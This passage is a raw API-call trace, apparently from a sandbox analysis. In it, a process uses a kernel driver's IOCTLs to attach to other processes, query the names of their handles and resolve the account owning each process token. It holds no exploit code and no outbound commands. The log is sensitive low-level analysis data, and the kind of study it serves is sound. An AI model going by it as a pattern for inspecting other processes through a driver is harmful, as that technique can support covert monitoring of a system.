ObjectNameInfo=0xfffffa80030b6044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030b6044, ReturnLength=0xfffff88005163508) returned 0x0 [0155.060] ObfDereferenceObject (Object=0xfffffa8002082400) returned 0x1 [0155.060] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0155.060] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0155.060] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0155.060] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0155.060] PsLookupProcessByProcessId (in: ProcessId=0x7fc, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0155.060] PsAcquireProcessExitSynchronization () returned 0x0 [0155.060] KeStackAttachProcess (in: PROCESS=0xfffffa8002084b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002084b30, ApcState=0xfffff880051635d0) [0155.061] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0155.061] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0155.061] PsReleaseProcessExitSynchronization () returned 0x2 [0155.061] ObfDereferenceObject (Object=0xfffffa8002084b30) returned 0x12 [0155.061] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80030b7044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030b7044, ReturnLength=0xfffff88005163550) returned 0x0 [0155.061] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0155.061] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0155.061] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0155.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6c0) returned 0xc8 [0155.061] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0155.061] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa800208e620, HandleInformation=0x0) returned 0x0 [0155.061] ObOpenObjectByPointer (in: Object=0xfffffa800208e620, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff800007c4) returned 0x0 [0155.162] ObfDereferenceObject (Object=0xfffffa800208e620) returned 0x14 [0155.162] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007c4, DesiredAccess=0x8, TokenHandle=0xfffffa8002669100 | out: TokenHandle=0xfffffa8002669100*=0xc4) returned 0x0 [0155.162] ZwClose (Handle=0xffffffff800007c4) returned 0x0 [0155.162] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0155.162] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0155.162] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0155.165] CloseHandle (hObject=0xc4) returned 1 [0155.165] CloseHandle (hObject=0xc8) returned 1 [0155.165] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0155.165] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0155.165] PsLookupProcessByProcessId (in: ProcessId=0x6c0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0155.165] PsAcquireProcessExitSynchronization () returned 0x0 [0155.165] KeStackAttachProcess (in: PROCESS=0xfffffa800208e620, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800208e620, ApcState=0xfffff880051635d0) [0155.165] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80020948d0, HandleInformation=0x0) returned 0x0 [0155.166] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0155.166] PsReleaseProcessExitSynchronization () returned 0x2 [0155.166] ObfDereferenceObject (Object=0xfffffa800208e620) returned 0x12 [0155.166] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800300b044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa800300b044, ReturnLength=0xfffff88005163508) returned 0x0 [0155.166] ObfDereferenceObject (Object=0xfffffa80020948d0) returned 0x1 [0155.166] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0155.166] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0155.166] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0155.166] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8c, lpOverlapped=0x0) returned 1 [0155.166] PsLookupProcessByProcessId (in: ProcessId=0x6c0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0155.166] PsAcquireProcessExitSynchronization () returned 0x0 [0155.166] KeStackAttachProcess (in: PROCESS=0xfffffa800208e620, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800208e620, ApcState=0xfffff880051635d0) [0155.166] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002086800, HandleInformation=0x0) returned 0x0 [0155.166] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0155.166] PsReleaseProcessExitSynchronization () returned 0x2 [0155.166] ObfDereferenceObject (Object=0xfffffa800208e620) returned 0x12 [0155.167] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030a02c4, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030a02c4, ReturnLength=0xfffff88005163508) returned 0x0 [0155.167] ObfDereferenceObject (Object=0xfffffa8002086800) returned 0x1 [0155.167] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0155.167] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0155.167] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0155.167] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0155.167] PsLookupProcessByProcessId (in: ProcessId=0x6c0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0155.167] PsAcquireProcessExitSynchronization () returned 0x0 [0155.167] KeStackAttachProcess (in: PROCESS=0xfffffa800208e620, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800208e620, ApcState=0xfffff880051635d0) [0155.167] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0155.167] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0155.167] PsReleaseProcessExitSynchronization () returned 0x2 [0155.167] ObfDereferenceObject (Object=0xfffffa800208e620) returned 0x12 [0155.167] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8002ee5044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002ee5044, ReturnLength=0xfffff88005163550) returned 0x0 [0155.168] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0155.168] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0155.168] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0155.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x348) returned 0xc8 [0155.168] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0155.168] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa800209d060, HandleInformation=0x0) returned 0x0 [0155.168] ObOpenObjectByPointer (in: Object=0xfffffa800209d060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff800007c4) returned 0x0 [0155.168] ObfDereferenceObject (Object=0xfffffa800209d060) returned 0x14 [0155.168] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007c4, DesiredAccess=0x8, TokenHandle=0xfffffa8002669100 | out: TokenHandle=0xfffffa8002669100*=0xc4) returned 0x0 [0155.168] ZwClose (Handle=0xffffffff800007c4) returned 0x0 [0155.168] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0155.168] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0155.168] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0155.171] CloseHandle (hObject=0xc4) returned 1 [0155.171] CloseHandle (hObject=0xc8) returned 1 [0155.171] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0155.171] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0155.171] PsLookupProcessByProcessId (in: ProcessId=0x348, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0155.171] PsAcquireProcessExitSynchronization () returned 0x0 [0155.171] KeStackAttachProcess (in: PROCESS=0xfffffa800209d060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800209d060, ApcState=0xfffff880051635d0) [0155.171] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800209fa20, HandleInformation=0x0) returned 0x0 [0155.171] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0155.172] PsReleaseProcessExitSynchronization () returned 0x2 [0155.172] ObfDereferenceObject (Object=0xfffffa800209d060) returned 0x12 [0155.172] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030b5044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030b5044, ReturnLength=0xfffff88005163508) returned 0x0 [0155.172] ObfDereferenceObject (Object=0xfffffa800209fa20) returned 0x1 [0155.172] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0155.172] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0155.172] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0155.172] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8a, lpOverlapped=0x0) returned 1 [0155.172] PsLookupProcessByProcessId (in: ProcessId=0x348, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0155.172] PsAcquireProcessExitSynchronization () returned 0x0 [0155.172] KeStackAttachProcess (in: PROCESS=0xfffffa800209d060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800209d060, ApcState=0xfffff880051635d0) [0155.172] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80020a1e90, HandleInformation=0x0) returned 0x0 [0155.172] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0155.172] PsReleaseProcessExitSynchronization () returned 0x2 [0155.173] ObfDereferenceObject (Object=0xfffffa800209d060) returned 0x12 [0155.173] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030ab044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030ab044, ReturnLength=0xfffff88005163508) returned 0x0 [0155.173] ObfDereferenceObject (Object=0xfffffa80020a1e90) returned 0x1 [0155.173] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0155.173] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0155.173] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0155.173] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0155.173] PsLookupProcessByProcessId (in: ProcessId=0x348, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0155.173] PsAcquireProcessExitSynchronization () returned 0x0 [0155.173] KeStackAttachProcess (in: PROCESS=0xfffffa800209d060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800209d060, ApcState=0xfffff880051635d0) [0155.173] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0155.173] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0155.173] PsReleaseProcessExitSynchronization () returned 0x2 [0155.173] ObfDereferenceObject (Object=0xfffffa800209d060) returned 0x12 [0155.173] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003003044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8003003044, ReturnLength=0xfffff88005163550) returned 0x0 [0155.174] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0155.174] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0155.174] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0155.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xc8 [0155.174] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0155.174] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8003910240, HandleInformation=0x0) returned 0x0 [0155.174] ObOpenObjectByPointer (in: Object=0xfffffa8003910240, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff800007c4) returned 0x0 [0155.174] ObfDereferenceObject (Object=0xfffffa8003910240) returned 0x14 [0155.174] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007c4, DesiredAccess=0x8, TokenHandle=0xfffffa8002669100 | out: TokenHandle=0xfffffa8002669100*=0xc4) returned 0x0 [0155.174] ZwClose (Handle=0xffffffff800007c4) returned 0x0 [0155.174] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0155.174] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0155.174] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0155.177] CloseHandle (hObject=0xc4) returned 1 [0155.177] CloseHandle (hObject=0xc8) returned 1 [0155.177] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0155.177] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0155.177] PsLookupProcessByProcessId (in: ProcessId=0x310, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0155.177] PsAcquireProcessExitSynchronization () returned 0x0 [0155.177] KeStackAttachProcess (in: PROCESS=0xfffffa8003910240, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003910240, ApcState=0xfffff880051635d0) [0155.177] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80020a1070, HandleInformation=0x0) returned 0x0 [0155.177] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0155.178] PsReleaseProcessExitSynchronization () returned 0x2 [0155.178] ObfDereferenceObject (Object=0xfffffa8003910240) returned 0x12 [0155.178] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030b4044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030b4044, ReturnLength=0xfffff88005163508) returned 0x0 [0155.178] ObfDereferenceObject (Object=0xfffffa80020a1070) returned 0x1 [0155.178] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0155.178] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0155.178] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0155.178] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x80, lpOverlapped=0x0) returned 1 [0155.178] PsLookupProcessByProcessId (in: ProcessId=0x310, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0155.178] PsAcquireProcessExitSynchronization () returned 0x0 [0155.178] KeStackAttachProcess (in: PROCESS=0xfffffa8003910240, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003910240, ApcState=0xfffff880051635d0) [0155.178] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002033ba0, HandleInformation=0x0) returned 0x0 [0155.178] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0155.178] PsReleaseProcessExitSynchronization () returned 0x2 [0155.178] ObfDereferenceObject (Object=0xfffffa8003910240) returned 0x12 [0155.179] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003004044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8003004044, ReturnLength=0xfffff88005163508) returned 0x0 [0155.179] ObfDereferenceObject (Object=0xfffffa8002033ba0) returned 0x1 [0155.179] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0155.179] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0155.179] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0155.179] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0155.179] PsLookupProcessByProcessId (in: ProcessId=0x310, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0155.179] PsAcquireProcessExitSynchronization () returned 0x0 [0155.179] KeStackAttachProcess (in: PROCESS=0xfffffa8003910240, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003910240, ApcState=0xfffff880051635d0) [0155.179] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0155.179] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0155.179] PsReleaseProcessExitSynchronization () returned 0x2 [0155.179] ObfDereferenceObject (Object=0xfffffa8003910240) returned 0x12 [0155.179] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8002ff8044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002ff8044, ReturnLength=0xfffff88005163550) returned 0x0 [0155.179] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0155.179] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0155.179] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0155.180] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x54c) returned 0xc8 [0155.180] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0155.180] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8001f49b30, HandleInformation=0x0) returned 0x0 [0155.180] ObOpenObjectByPointer (in: Object=0xfffffa8001f49b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff800007c4) returned 0x0 [0155.180] ObfDereferenceObject (Object=0xfffffa8001f49b30) returned 0x14 [0155.180] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007c4, DesiredAccess=0x8, TokenHandle=0xfffffa8002669100 | out: TokenHandle=0xfffffa8002669100*=0xc4) returned 0x0 [0155.180] ZwClose (Handle=0xffffffff800007c4) returned 0x0 [0155.180] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0155.180] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0155.180] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0156.093] CloseHandle (hObject=0xc4) returned 1 [0156.093] CloseHandle (hObject=0xc8) returned 1 [0156.094] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.094] 